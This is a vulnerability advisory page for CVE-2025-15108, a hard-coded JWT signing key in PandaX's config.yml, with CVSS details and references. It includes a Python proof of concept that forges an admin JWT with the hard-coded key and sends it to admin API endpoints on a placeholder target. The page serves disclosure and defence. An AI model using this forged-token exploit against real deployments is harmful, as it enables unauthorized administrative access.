Security Vulnerability Report
CVE-2025-15108 CVSS 3.7 LOW

Published: 2025-12-27 17:15:47
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was detected in PandaXGO PandaX up to fb8ff40f7ce5dfebdf66306c6d85625061faf7e5. This affects an unknown function of the file config.yml of the component JWT Secret Handler. The manipulation of the argument key results in the use of a hard-coded cryptographic key. The attack may be performed from remote. This attack is characterized by high complexity. The exploitability is reported as difficult. The exploit is now public and may be used. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS Score: 3.7
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

PandaXGO PandaX <= fb8ff40f7ce5dfebdf66306c6d85625061faf7e5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-15108 PoC - JWT Secret Hard-coded Key Exploitation
# This PoC demonstrates how to exploit the hard-coded JWT secret vulnerability
import jwt
import requests
from datetime import datetime, timedelta, timezone

# Hard-coded JWT secret from config.yml (obtained from source code)
# The actual key value needs to be extracted from the vulnerable config.yml file
JWT_SECRET = "extracted_hard_coded_key_from_config"  # Replace with actual key
# Base URL of the target; the endpoint paths below already carry the /api prefix
TARGET_URL = "http://target-server.com"


def create_fake_jwt_token(username="admin", roles=None):
    """Generate a fake JWT token with custom claims"""
    if roles is None:
        roles = ["admin"]
    now = datetime.now(timezone.utc)
    payload = {
        "sub": username,
        "roles": roles,
        "iat": now,
        "exp": now + timedelta(days=7),
        "iss": "PandaX",
        "aud": "PandaX-API",
    }
    # Sign the token with the hard-coded secret (HS256 = HMAC over the shared key)
    token = jwt.encode(payload, JWT_SECRET, algorithm="HS256")
    return token


def exploit(target_url, fake_token, username="admin"):
    """Send the fake token to the target API"""
    headers = {
        "Authorization": f"Bearer {fake_token}",
        "Content-Type": "application/json",
    }
    # Try to access protected endpoints
    endpoints = ["/api/admin/users", "/api/admin/config", "/api/protected"]
    for endpoint in endpoints:
        try:
            response = requests.get(f"{target_url}{endpoint}", headers=headers, timeout=10)
            print(f"[+] Request to {endpoint}: Status {response.status_code}")
            if response.status_code == 200:
                print(f"    [!] Successfully authenticated as {username}!")
                print(f"    Response: {response.text[:200]}")
        except Exception as e:
            print(f"[-] Error accessing {endpoint}: {e}")


if __name__ == "__main__":
    # Generate fake admin token
    fake_token = create_fake_jwt_token("admin", ["admin", "superuser"])
    print(f"[*] Generated fake JWT token: {fake_token}")
    # Attempt exploitation
    exploit(TARGET_URL, fake_token, "admin")
```

References

https://github.com/PandaXGO/PandaX/issues/9
https://vuldb.com/?ctiid.338479
https://vuldb.com/?id.338479
https://vuldb.com/?submit.711519

Weaknesses

CWE-320
CWE-321

Additional Record Data

Vulnerability Status: Deferred
CVSS 4.0 (Secondary): 2.9 LOW, Exploit Maturity: PROOF_OF_CONCEPT
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
CVSS 3.1 (Primary): 3.7 LOW, Exploitability Score: 2.2, Impact Score: 1.4
CVSS 2.0 (Secondary): 2.6 LOW, Exploitability Score: 4.9, Impact Score: 2.9
CVSS 2.0 Vector: AV:N/AC:H/Au:N/C:P/I:N/A:N